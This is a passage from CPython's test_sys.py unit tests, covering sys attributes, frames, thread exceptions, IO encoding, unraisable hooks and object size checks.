self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
def test_current_exceptions(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize('2nP2n') + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize('2nP2n') + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
localsplus = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees
check(x, vsize('8P3i3c' + localsplus*'P'))
# function
def func(): pass
check(func, size('14P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
